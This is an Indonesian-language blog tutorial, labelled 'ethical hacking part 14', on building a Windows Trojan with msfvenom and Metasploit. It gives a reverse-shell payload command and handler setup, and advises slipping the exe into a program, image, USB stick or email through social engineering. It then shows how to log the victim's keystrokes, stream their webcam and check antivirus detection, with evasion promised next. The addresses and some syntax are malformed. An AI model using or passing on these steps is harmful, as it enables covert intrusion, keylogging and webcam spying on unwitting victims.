ethical hacking part 14 membuat malware Trojan
ethical hacking part 14 membuat malware Trojan
Di tutorial Kali ini Kita akan belajar membuat virus Trojan , apa itu Trojan ,Trojan ini adalah sebuah malicious software (malware) Yang merupakan file exe Yang berbahaya Yang dimana didalam file exe tersebut Kita memasukan payloads Yang Kita gunakan untuk memperoleh akses pada target mesin
Untuk menggunakan Trojan ini Kita harus memasukan sendiri Trojan kedalam target mesin ,caranya bisa saja Kita gunakan USB,kirim melalui email apapun caranya Yang penting Trojan ini bisa masuk kedalam target mesin Dan user dari target mesin nya harus menjalankan Trojan tersebut ,Cara nya bisa saja Kita masukan Trojan nya kedalam sebuah program Dan ketika user mendownload,menginstall Dan menjalan program tersebut Trojan nya akan memberi Kita akses ataupun Kita sisipkan kedalam sebuah gambar (image) Dan ketika usernya membuka gambarnya maka Kita Akan memperoleh akses ,membutuhkan skill sosial engineering tinggi untuk melakukan exploit ini.
Trojan ini bisa Kita buat dengan tools msfvenom di metasploit framework,
Perlu Kita ingat walaupun Kita bisa membuat Trojan ,Ada satu rintangan Yang harus Kita lalui yaitu anti virus ,Dan security dari os tersebut.
Nanti Kita akan membuat Trojan dimulai dari Trojan Yang Paling simpel Yang masih bisa di deteksi antivirus sampai ke Trojan Yang tidak terdeteksi oleh Window security nya baik itu antivirus ataupun window defender nya.
Kita Akan membuat Trojan Yang simpel Yang sederhana untuk memperoleh akses ,tetapi Yang satu ini masih bisa di deteksi oleh anti virus,Dan untuk menjalankan nya pastikan target Kita mematikan window defender Dan antivirus
=> msfvenom
=>msfvenom -p window/x64/meterpreter/reverse_tcp LHOST 2572.382.382 LPORT 9999 -f exe -0 namafile.exe
(untuk port bebas masukan port berapa saja)
=> msfconsole
=>use exploit/multi/handler
=>show options
=>set LHOST 362.48282.282
=>set LPORT 9999
=>set payload window/x64/meterpreter/reverse_tcp
=>run
Jika sudah Ada tulisan started reverse tcp handler on itu artinya Kita sedang menunggu target menjalankan Trojan kita
=>Kirim Dan pastikan program Trojan tersebut terinstall di komputer target
Jika program Trojan sudah di download di install Dan di jalankan oleh target maka kalian otomatis akan Masuk kedalam meterpreter
Kita bisa memakai keylogger dengan memasukan command keyscan_start
Keylogger ini artinya Kita dapat merekam apa saja Yang di ketikan oleh user
keyscan_stop untuk menghentikan keylogger
keyscan_Dump untuk melihat hasil rekaman nya
Kita juga bisa menyalakan webcam target secara live dengan menggunakan perintah
webcam_stream
Dan ini bisa berjalan apabila target memiliki webcam /kamera
Kita bisa melihat antivirus apa saja Yang bisa mendeteksi Trojan yang Kita buat ini
Dengan menggunakan website virustotal.com
Upload Trojan Kita kemudian virustotal Akan mengecek
Dan muncul hasil nya anti virus apa saja Yang bisa mendeteksi Trojan Kita
Ini hanyalah Trojan sederhana ,di tutorial selanjutnya Kita akan membuat Trojan dengan kemungkinan sedikit anti virus Yang bisa mendeteksi nya
Komentar
Posting Komentar